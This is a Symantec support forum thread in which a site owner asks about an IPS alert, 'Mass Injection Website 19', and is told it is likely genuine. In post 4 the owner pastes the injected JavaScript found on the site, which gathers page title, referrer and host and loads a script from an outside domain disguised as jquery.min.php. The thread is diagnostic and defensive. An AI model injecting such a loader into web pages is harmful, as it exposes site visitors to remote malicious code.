Endpoint Protection

 View Only

  • 1.  Web Attack: Mass Injection Website 19

    Posted Jan 26, 2016 03:15 AM

    Hello,

    I have problem with web site www.vyrava.sk.

    log from SEP:

    22.1.2016 12:23:26    Intrusion Prevention    Critical    Incoming    TCP    37.9.175.19    80    N/A    192.168.102.101    52317    N/A    \DEVICE\HARDDISKVOLUME4\PROGRAM FILES (X86)\INTERNET EXPLORER\IEXPLORE.EXE    28821    70105    Web Attack: Mass Injection Website 19    www.vyrava.sk/        22.1.2016 12:23:02    22.1.2016 12:23:11    [SID: 28821] Web Attack: Mass Injection Website 19 attack blocked. Traffic has been blocked for this application: \DEVICE\HARDDISKVOLUME4\PROGRAM FILES (X86)\INTERNET EXPLORER\IEXPLORE.EXE

    https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=28821

    I think, this web site www.vyrava.sk is ok.

    I would like to make exception fort this, for example:

    28821.png

    but there is ONLY severity "High" and I need severity "Critical"

    We checked our site and make sure no virus on our server and site, would like to request to delist from the Symantec Endpoint Protection. I go tohttp://ipremoval.sms.symantec.com/lookup/ and https://sitecheck.sucuri.net, we found out that our server IP was not listed.

    Why my site was reported as Web Attack? What should I do next?

    Thank you very much for your advice.



  • 2.  RE: Web Attack: Mass Injection Website 19

    Posted Jan 26, 2016 06:50 AM

    This is your site correct? Have you verified no malicious code was injected in it? See both of these threads with the same example:

    https://www-secure.symantec.com/connect/forums/mass-injection-website-19

    https://www-secure.symantec.com/connect/forums/mass-injection-website-19-0

    Symantec also has a blog on it:

    http://www.symantec.com/connect/blogs/global-mass-injection-affects-thousands-websites-worldwide



  • 3.  RE: Web Attack: Mass Injection Website 19
    Best Answer

    Posted Jan 26, 2016 08:06 AM

    Hi luben,

    Thanks for the post- this has become a common query and no, it is probably not a False Positive.  See the links that Brian supplied, above.  Here's another good link:

    Web Attack: Mass Injection Website 19 — Solved!


  • 4.  RE: Web Attack: Mass Injection Website 19

    Posted Jan 27, 2016 03:33 AM

    Thank you for your response.

    I found this script on web site.

    "<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://integracyjne-imprezy.eu/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>"



  • 5.  RE: Web Attack: Mass Injection Website 19

    Posted Jan 27, 2016 07:39 AM

    Clean that up and make sure you lockdown your website so not everyone is able to perform malicious actions.